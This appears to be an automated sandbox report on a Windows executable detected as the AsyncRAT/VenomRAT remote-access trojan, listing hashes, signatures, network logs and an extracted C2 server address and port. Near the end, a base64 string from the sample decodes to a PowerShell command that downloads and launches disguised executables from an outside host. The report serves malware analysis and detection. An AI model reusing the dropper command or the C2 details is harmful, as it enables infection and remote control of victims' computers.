Windows Analysis Report
0pF5Vz4xG4.exe

Overview

General Information

Sample name:	0pF5Vz4xG4.exe renamed because original name is a hash value
Original sample name:	850932bf796d17da05dc8c531993db6423b56686ff7dc68cc0a802e87f827fad.exe
Analysis ID:	1447642
MD5:	769a1873247d5024808cf7bd70555b01
SHA1:	2e55be1191affa933438890fc34eb31136bef045
SHA256:	850932bf796d17da05dc8c531993db6423b56686ff7dc68cc0a802e87f827fad
Tags:	exevenomrat
Infos:

Detection

AsyncRAT

Score:	96
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Yara detected AsyncRAT

.NET source code contains potential unpacker

.NET source code references suspicious native API functions

AI detected suspicious sample

Contains functionality to log keystrokes (.Net Source)

Machine Learning detection for sample

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

AV process strings found (often used to terminate AV products)

Creates a process in suspended mode (likely to inject code)

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

PE file does not import any functions

Sample file is different than original file name gathered from version info

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
AsyncRAT	AsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victims computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques.	No Attribution	https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/asyncrat-onenote-dropper https://aidenmitchell.ca/asyncrat-via-vbs/ https://assets.virustotal.com/reports/2021trends.pdf https://axmahr.github.io/posts/asyncrat-detection/ https://blog.checkpoint.com/research/november-2023s-most-wanted-malware-new-asyncrat-campaign-discovered-while-fakeupdates-re-entered-the-top-ten-after-brief-hiatus/	https://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat

Signatures

AV Detection

Found malware configuration

Source: 0pF5Vz4xG4.exe

Malware Configuration Extractor: AsyncRAT {"Ports": ["4449"], "Server": ["94.156.65.172"], "Certificate": "MIICOTCCAaKgAwIBAgIVAPyfwFFMs6hxoSr1U5gHJmBruaj1MA0GCSqGSIb3DQEBDQUAMGoxGDAWBgNVBAMMD1Zlbm9tUkFUIFNlcnZlcjETMBEGA1UECwwKcXdxZGFuY2h1bjEfMB0GA1UECgwWVmVub21SQVQgQnkgcXdxZGFuY2h1bjELMAkGA1UEBwwCU0gxCzAJBgNVBAYTAkNOMB4XDTIyMDgxNDA5NDEwOVoXDTMzMDUyMzA5NDEwOVowEzERMA8GA1UEAwwIVmVub21SQVQwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAJMk9aXYluIabmb8kV7b5XTizjGIK0IH5qWN260bNCSIKNt2zQOLq6jGfh+VvAA/ddzW3TGyxBUMbya8CatcEPCCiU4SEc8xjyE/n8+O0uya4p8g4ooTRIrNFHrRVySKchyTv32rce963WWvmj+qDvwUHHkEY+Dsjf46C40vWLDxAgMBAAGjMjAwMB0GA1UdDgQWBBQsonRhlv8vx7fdxs/nJE8fsLDixjAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4GBAAVFFK4iQZ7aqDrUwV6nj3VoXFOcHVo+g9p9ikiXT8DjC2iQioCrN3cN4+w7YOkjPDL+fP3A7v+EI9z1lwEHgAqFPY7tF7sT9JEFtq/+XPM9bgDZnh4o1EWLq7Zdm66whSYsGIPR8wJdtjw6U396lrRHe6ODtIGB/JXyYYIdaVrz", "Server Signature": "kqqmqcHW+lrfDFUM+L+OdEMYusuLLkWntK3q1MWb1AnedZMdr2oAlXEGkreKRl0JNVwhdGMQgoNPJLnKDu9Nux3mwulmhQchyeUxqfxX5H8M87MqPLcXnKblAMoa8m+VyRGCVFn59iBwizEj16DMiLuv1h27Dkx3yjZaVlktefI="}

Multi AV Scanner detection for submitted file

Source: 0pF5Vz4xG4.exe

Virustotal: Detection: 50%

Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 78.3% probability

Machine Learning detection for sample

Source: 0pF5Vz4xG4.exe

Joe Sandbox ML: detected

Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=0pF5Vz4xG4.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0	HTTP Parser: No favicon
Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=0pF5Vz4xG4.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0	HTTP Parser: No favicon
Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=0pF5Vz4xG4.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0	HTTP Parser: No favicon
Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=0pF5Vz4xG4.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0	HTTP Parser: No favicon
Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=0pF5Vz4xG4.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0	HTTP Parser: No favicon

Source: unknown	HTTPS traffic detected: 2.19.104.72:443 -> 192.168.2.6:49719 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 2.19.104.72:443 -> 192.168.2.6:49724 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.6:49760 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.6:49796 version: TLS 1.2

Source: 0pF5Vz4xG4.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 13.107.246.45 13.107.246.45
Source: Joe Sandbox View	IP Address: 13.107.246.60 13.107.246.60
Source: Joe Sandbox View	IP Address: 239.255.255.250 239.255.255.250

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4

Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.104.72
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.104.72
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.104.72
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.104.72
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.104.72
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.104.72
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.104.72
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.104.72
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.104.72
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.104.72
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.104.72
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.104.72
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.104.72
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.104.72
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.104.72
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.104.72
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.104.72
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.104.72
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50

Source: global traffic	HTTP traffic detected: GET /mscc/lib/v2/wcp-consent.js HTTP/1.1Host: wcpstatic.microsoft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://learn.microsoft.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /scripts/c/ms.jsll-3.min.js HTTP/1.1Host: js.monitor.azure.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://learn.microsoft.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: /Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=C2sHvMB2cv7dmAa&MD=lE+CS+hL HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=C2sHvMB2cv7dmAa&MD=lE+CS+hL HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com

Source: chromecache_101.5.dr	String found in binary or memory: href="https://www.linkedin.com/cws/share?url=${encodeURIComponent(e)}&text=${encodeURIComponent(aS.replace("{credentialName}",t.title))}" equals www.linkedin.com (Linkedin)
Source: chromecache_101.5.dr	String found in binary or memory: href="https://www.facebook.com/sharer/sharer.php?u=${s}" equals www.facebook.com (Facebook)
Source: chromecache_101.5.dr	String found in binary or memory: href="https://www.linkedin.com/cws/share?url=${s}" equals www.linkedin.com (Linkedin)
Source: chromecache_101.5.dr	String found in binary or memory: </div>`}function mCe(t){return t.authenticationModes?t.authenticationModes.map(e=>e.type).includes("MSA"):!1}function fCe(t){let e=t.authenticationModes.find(o=>o.type==="MSA");return e?e.upn:null}function gCe(t){let e=t.authenticationModes.find(o=>o.type==="AAD");return e?e.upn:null}function hCe(t,e,o){return e??(Qt(t.email)?o:t.email)??""}function Dre(t){let e=mCe(t),o=e?fCe(t):null,n=e?null:gCe(t),r=hCe(t,o,n);return[e,r]}function bCe(t,e){let[o,n]=Dre(e);if(o){let i=t.querySelector("#report-msa-email-account");i.innerText=n}let r=t.querySelector("#opt-into-email-checkbox"),s=t.querySelector("#submitter-info");r.addEventListener("change",()=>{r.checked?s.hidden=!1:s.hidden=!0})}function _Ce(t){if(!t)return;let e=t.querySelector("#select-reason"),o=t.querySelector("#other-reason-textarea-container"),n=o.querySelector("textarea");!e\|\|!o\|\|!n\|\|(e.value==="Other"&&(o.hidden=!1,n.required=!0),e.addEventListener("change",()=>{e.value==="Other"\|\|e.value==="14"?(o.hidden=!1,n.required=!0,n.disabled=!1):(o.hidden=!0,n.required=!1,n.disabled=!0)}))}var Wt;function $re(){let t=document.getElementById("share-to-linkedin-profile");t&&t.addEventListener("click",e=>{let o=e.currentTarget,n=JSON.parse(o.dataset.credential),r=document.createElement("div"),s=vCe(n);S(s,r),Wt=new xe(r),Wt.show();let i=document.getElementById("share-to-feed-button"),a=document.getElementById("linkedin-feed-message"),l=new URL(decodeURI(i.getAttribute("href")));a.onchange=()=>{l.searchParams.set("text",a.value),i.setAttribute("href",l.toString())}})}function vCe(t){let e=encodeURI(`https://${location.host}/api/credentials/share/${_.data.userLocale}/${R.userName}/${t?.credentialId}?sharingId=${R.sharingId}`),o=1035,n=i=>new Date(i).getFullYear(),r=i=>new Date(i).getMonth()+1,s=encodeURI(`https://www.linkedin.com/profile/add?startTask=CERTIFICATION_NAME&name=${t.title}&organizationId=${o}&issueYear=${n(t.awardedOn)}&issueMonth=${r(t.awardedOn)}&expirationYear=${t.expiresOn?n(t.expiresOn):""}&expirationMonth=${t.expiresOn?r(t.expiresOn):""}&certUrl=${e}&certId=${t.credentialId}&skills=${t.skills?`${t.skills.map(i=>encodeURIComponent(i)).join(",")}`:""}`);return m` equals www.linkedin.com (Linkedin)
Source: chromecache_101.5.dr	String found in binary or memory: </section>`}function Xne(t=dx,e=xd){return Aa(rH,t,e)}function ere(t=bx,e=gx){return Aa(E2,t,e)}var yA=(s=>(s.facebook="facebook",s.twitter="twitter",s.linkedin="linkedin",s.email="email",s.weibo="weibo",s))(yA\|\|{}),nEe={facebook:"https://www.facebook.com/sharer/sharer.php?u={url}",twitter:"https://twitter.com/intent/tweet?original_referer={url}&text={achievementCopy}&tw_p=tweetbutton&url={url}",linkedin:"https://www.linkedin.com/feed/?shareActive=true&text={body}",email:"mailto:?subject={subject}&body={body}",weibo:"http://service.weibo.com/share/share.php?title={title}&url={url}"};function hy(t,e,o){let n=encodeURIComponent(e),r=new URL(t);r.hostname="learn.microsoft.com";let s=r.href+=(t.indexOf("?")!==-1?"&":"?")+"WT.mc_id=",i=R.sharingId?`&sharingId=${R.sharingId}`:"";return Object.values(yA).reduce((l,c)=>{if(_.data.isPermissioned)return l[c]="#",l;let u=encodeURIComponent(s+c+i),d=o?.achievementCopyTitle?.overrideTitle??e,p=encodeURIComponent($9.replace("{achievementTitle}",o?.achievementCopyTitle?.isUnquoted?`${d}`:`"${d}"`)),f={achievementCopy:p,url:u,title:n,body:`${p}${encodeURIComponent(` equals www.facebook.com (Facebook)
Source: chromecache_101.5.dr	String found in binary or memory: </section>`}function Xne(t=dx,e=xd){return Aa(rH,t,e)}function ere(t=bx,e=gx){return Aa(E2,t,e)}var yA=(s=>(s.facebook="facebook",s.twitter="twitter",s.linkedin="linkedin",s.email="email",s.weibo="weibo",s))(yA\|\|{}),nEe={facebook:"https://www.facebook.com/sharer/sharer.php?u={url}",twitter:"https://twitter.com/intent/tweet?original_referer={url}&text={achievementCopy}&tw_p=tweetbutton&url={url}",linkedin:"https://www.linkedin.com/feed/?shareActive=true&text={body}",email:"mailto:?subject={subject}&body={body}",weibo:"http://service.weibo.com/share/share.php?title={title}&url={url}"};function hy(t,e,o){let n=encodeURIComponent(e),r=new URL(t);r.hostname="learn.microsoft.com";let s=r.href+=(t.indexOf("?")!==-1?"&":"?")+"WT.mc_id=",i=R.sharingId?`&sharingId=${R.sharingId}`:"";return Object.values(yA).reduce((l,c)=>{if(_.data.isPermissioned)return l[c]="#",l;let u=encodeURIComponent(s+c+i),d=o?.achievementCopyTitle?.overrideTitle??e,p=encodeURIComponent($9.replace("{achievementTitle}",o?.achievementCopyTitle?.isUnquoted?`${d}`:`"${d}"`)),f={achievementCopy:p,url:u,title:n,body:`${p}${encodeURIComponent(` equals www.linkedin.com (Linkedin)
Source: chromecache_101.5.dr	String found in binary or memory: </section>`}function Xne(t=dx,e=xd){return Aa(rH,t,e)}function ere(t=bx,e=gx){return Aa(E2,t,e)}var yA=(s=>(s.facebook="facebook",s.twitter="twitter",s.linkedin="linkedin",s.email="email",s.weibo="weibo",s))(yA\|\|{}),nEe={facebook:"https://www.facebook.com/sharer/sharer.php?u={url}",twitter:"https://twitter.com/intent/tweet?original_referer={url}&text={achievementCopy}&tw_p=tweetbutton&url={url}",linkedin:"https://www.linkedin.com/feed/?shareActive=true&text={body}",email:"mailto:?subject={subject}&body={body}",weibo:"http://service.weibo.com/share/share.php?title={title}&url={url}"};function hy(t,e,o){let n=encodeURIComponent(e),r=new URL(t);r.hostname="learn.microsoft.com";let s=r.href+=(t.indexOf("?")!==-1?"&":"?")+"WT.mc_id=",i=R.sharingId?`&sharingId=${R.sharingId}`:"";return Object.values(yA).reduce((l,c)=>{if(_.data.isPermissioned)return l[c]="#",l;let u=encodeURIComponent(s+c+i),d=o?.achievementCopyTitle?.overrideTitle??e,p=encodeURIComponent($9.replace("{achievementTitle}",o?.achievementCopyTitle?.isUnquoted?`${d}`:`"${d}"`)),f={achievementCopy:p,url:u,title:n,body:`${p}${encodeURIComponent(` equals www.twitter.com (Twitter)

Source: global traffic	DNS traffic detected: DNS query: js.monitor.azure.com
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: mdec.nelreports.net

Source: chromecache_101.5.dr	String found in binary or memory: http://polymer.github.io/AUTHORS.txt
Source: chromecache_101.5.dr	String found in binary or memory: http://polymer.github.io/CONTRIBUTORS.txt
Source: chromecache_101.5.dr	String found in binary or memory: http://polymer.github.io/LICENSE.txt
Source: chromecache_101.5.dr	String found in binary or memory: http://polymer.github.io/PATENTS.txt
Source: chromecache_85.5.dr	String found in binary or memory: http://schema.org/Organization
Source: chromecache_85.5.dr	String found in binary or memory: https://aka.ms/ContentUserFeedback
Source: chromecache_101.5.dr	String found in binary or memory: https://aka.ms/MSBuildChallenge/T1?ocid=build24_csc_learnpromo_T1_cnl
Source: chromecache_101.5.dr	String found in binary or memory: https://aka.ms/banner_mslearn_tier1?wt.mc_id=build24_t1_learnpromotion_events
Source: chromecache_101.5.dr	String found in binary or memory: https://aka.ms/certhelp
Source: chromecache_85.5.dr, chromecache_75.5.dr, chromecache_106.5.dr	String found in binary or memory: https://aka.ms/feedback/report?space=61
Source: chromecache_101.5.dr	String found in binary or memory: https://aka.ms/pshelpmechoose
Source: chromecache_85.5.dr	String found in binary or memory: https://aka.ms/yourcaliforniaprivacychoices
Source: chromecache_85.5.dr	String found in binary or memory: https://authoring-docs-microsoft.poolparty.biz/devrel/69c76c32-967e-4c65-b89a-74cc527db725
Source: chromecache_85.5.dr	String found in binary or memory: https://authoring-docs-microsoft.poolparty.biz/devrel/7696cda6-0510-47f6-8302-71bb5d2e28cf
Source: chromecache_101.5.dr	String found in binary or memory: https://aznb-ame-prod.azureedge.net/component/$
Source: chromecache_101.5.dr	String found in binary or memory: https://channel9.msdn.com/
Source: chromecache_101.5.dr	String found in binary or memory: https://github.com/$
Source: chromecache_85.5.dr	String found in binary or memory: https://github.com/Thraka
Source: chromecache_85.5.dr	String found in binary or memory: https://github.com/Youssef1313
Source: chromecache_85.5.dr	String found in binary or memory: https://github.com/adegeo
Source: chromecache_85.5.dr	String found in binary or memory: https://github.com/dotnet/docs/blob/17c4acca45e573a92878a44a2cce57d699fe9c7c/docs/framework/install/
Source: chromecache_85.5.dr	String found in binary or memory: https://github.com/dotnet/docs/blob/live/docs/framework/install/application-not-started.md
Source: chromecache_85.5.dr	String found in binary or memory: https://github.com/dotnet/docs/blob/main/docs/framework/install/application-not-started.md
Source: chromecache_85.5.dr	String found in binary or memory: https://github.com/dotnet/docs/issues
Source: chromecache_85.5.dr	String found in binary or memory: https://github.com/dotnet/docs/issues/new?template=z-customer-feedback.yml
Source: chromecache_101.5.dr	String found in binary or memory: https://github.com/dotnet/try
Source: chromecache_85.5.dr	String found in binary or memory: https://github.com/gewarren
Source: chromecache_101.5.dr	String found in binary or memory: https://github.com/jonschlinkert/is-plain-object
Source: chromecache_101.5.dr	String found in binary or memory: https://github.com/js-cookie/js-cookie
Source: chromecache_85.5.dr	String found in binary or memory: https://github.com/mairaw
Source: chromecache_85.5.dr	String found in binary or memory: https://github.com/nschonni
Source: chromecache_85.5.dr	String found in binary or memory: https://js.monitor.azure.com/scripts/c/ms.jsll-3.min.js
Source: chromecache_101.5.dr	String found in binary or memory: https://learn-video.azurefd.net/
Source: chromecache_101.5.dr	String found in binary or memory: https://learn-video.azurefd.net/vod/player
Source: chromecache_101.5.dr	String found in binary or memory: https://management.azure.com/providers/Microsoft.Portal/consoles/default?api-version=2017-12-01-prev
Source: chromecache_101.5.dr	String found in binary or memory: https://management.azure.com/providers/Microsoft.Portal/userSettings/cloudconsole?api-version=2017-0
Source: chromecache_101.5.dr	String found in binary or memory: https://management.azure.com/subscriptions?api-version=2016-06-01
Source: chromecache_101.5.dr	String found in binary or memory: https://octokit.github.io/rest.js/#throttling
Source: chromecache_101.5.dr	String found in binary or memory: https://schema.org
Source: chromecache_101.5.dr	String found in binary or memory: https://twitter.com/intent/tweet?original_referer=$
Source: chromecache_101.5.dr	String found in binary or memory: https://www.linkedin.com/cws/share?url=$
Source: chromecache_101.5.dr	String found in binary or memory: https://www.linkedin.com/profile/add?startTask=CERTIFICATION_NAME&name=$

Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49698 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49698
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712

Source: unknown	HTTPS traffic detected: 2.19.104.72:443 -> 192.168.2.6:49719 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 2.19.104.72:443 -> 192.168.2.6:49724 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.6:49760 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.6:49796 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected AsyncRAT

Source: Yara match	File source: 0pF5Vz4xG4.exe, type: SAMPLE
Source: Yara match	File source: 0.0.0pF5Vz4xG4.exe.b70000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.2095950436.0000000000B72000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 0pF5Vz4xG4.exe PID: 7156, type: MEMORYSTR

Contains functionality to log keystrokes (.Net Source)

Source: 0pF5Vz4xG4.exe, Keylogger.cs

.Net Code: KeyboardLayout

System Summary

Malicious sample detected (through community Yara rule)

Source: 0pF5Vz4xG4.exe, type: SAMPLE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 0.0.0pF5Vz4xG4.exe.b70000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen

PE file does not import any functions

Source: 0pF5Vz4xG4.exe

Static PE information: No import functions for PE file found

Sample file is different than original file name gathered from version info

Source: 0pF5Vz4xG4.exe, 00000000.00000000.2095950436.0000000000B72000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameClientx64.exe" vs 0pF5Vz4xG4.exe
Source: 0pF5Vz4xG4.exe	Binary or memory string: OriginalFilenameClientx64.exe" vs 0pF5Vz4xG4.exe

Yara signature match

Source: 0pF5Vz4xG4.exe, type: SAMPLE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 0.0.0pF5Vz4xG4.exe.b70000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI

Source: 0pF5Vz4xG4.exe, Program.cs	Base64 encoded string: 'L2MgcG93ZXJzaGVsbCAoTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudCkuRG93bmxvYWRGaWxlKCdodHRwOi8veGN1LmV4Z2FtaW5nLmNsaWNrJywgJyVUZW1wJVxcRXhwSW9yZXIuZXhlJykgJiBwb3dlcnNoZWxsIChOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoJ2h0dHA6Ly94Y3U1LmV4Z2FtaW5nLmNsaWNrJywgJyVUZW1wJVxcRXhwbElvcmVyLmV4ZScpICYgcG93ZXJzaGVsbCBTdGFydC1Qcm9jZXNzIC1GaWxlUGF0aCAnJVRlbXAlXFxFeHBJb3Jlci5leGUnICYgcG93ZXJzaGVsbCBTdGFydC1Qcm9jZXNzIC1GaWxlUGF0aCAnJVRlbXAlXFxFeHBsSW9yZXIuZXhlJyAmIGV4aXQ='
Source: 0pF5Vz4xG4.exe, Settings.cs	Base64 encoded string: 'jXkAxQKdxWdKf6MulZtlNYU6T4qEdxLMPLu5+y70FwxaPzWHBOZsjaBJqdi8N/R7QrkuvKKrnqzxiMRLwavn3Q==', 'ozEtu3hRDvdntQ14K2rVsFw+W+1ePWsKMq82RBY/lS5QZlGsUkLLNq6N4B85bGE4caoqd/pKC2NTiNKftn85/w==', 'lJWcKE/WisnnPmk/afSaGnNNWfh3Z1YjCbaMyzuNbOE+WU7HqgcR1+ArYpqJRCnepG1be7lg2FIqcKZYCej1yMmak+W9vHZrWTyH9wbaX3JiSbBxIrmOeyHtSIOmoUc1', 'y/3x+hsSnm+9ccbUAPkqO4rO8Ux4onUjfKbe0vO0M8YdZNCXg74/pUCReRIf5KErux32JKbTqEuKL6x1UM4q9g==', 'PcwdjTKFAMgG3RHtaI7nTq63q8Eo8JQXLND55HmnBxDj7yCNlO/tUriInA85OeRIhQX6AJLdBKvLVtbRZKanDwGvA/WyTk/9TuqreAY49jM=', 